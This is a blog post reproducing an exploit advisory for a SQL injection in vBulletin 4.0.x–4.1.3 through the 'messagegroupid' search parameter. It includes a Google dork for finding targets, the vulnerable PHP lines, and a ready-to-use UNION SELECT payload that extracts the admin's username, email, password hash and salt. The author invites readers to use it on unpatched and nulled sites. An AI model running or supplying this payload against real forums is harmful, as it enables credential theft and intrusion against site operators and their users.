Saturday, August 6, 2011
# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
# Google Dork: intitle: powered by Vbulletin 4 |
# Software Link: [[url]http://www.vbulletin.com/][/url] |
# Tested on: [relevant os] |
# CVE : [[url]http://members.vbulletin.com/][/url] |
###################################################################################################### |
###################################################################################################### |
Vbulletin
4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in
parameter "&messagegroupid" due to improper input validation. |
##################################################################################################### |
##################################################################################################### |
File: /vbforum/search/type/socialgroupmessage.php |
Paramater : messagegroupid |
if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0) |
$value = $registry->GPC['messagegroupid']; |
if (!(in_array(' ',$value) OR in_array('',$value))) |
if ($rst = $vbulletin->db->query_read(" |
FROM " . TABLE_PREFIX."socialgroup AS socialgroup |
---> WHERE socialgroup.groupid IN (" . implode(', ', $value) .")") |
############################################################################################ |
############################################################################################ |
Post data on: -->search.php?search_type=1 |
--> Search Single Content Type |
Keywords : Valid Group Message |
Search Type : Group Messages |
Search in Group : Valid Group Id |
&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1# |
########################################################################################## |
########################################################################################## |
Http://www.Garage4Hackers.com |
http://www.garage4hackers.com/showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day |
########################################################################################### |
########################################################################################### |
Funny
part was that, a similar bug was found in the same module, search query
two months back. Any way Vbulletin has released a patch as it was
reported to them by altex, hence |
customers are safe except those lowsy Admins. And this bug is for people to play with the many Nulled VB sites out there.
- Copyright ©
.Hacking Cracking Tricks And Tutorials, Paid Scripts, Latest Exploits, 0Day Vulnerability, - Skyblue - Powered by Blogger - Designed by Johanes Djogan -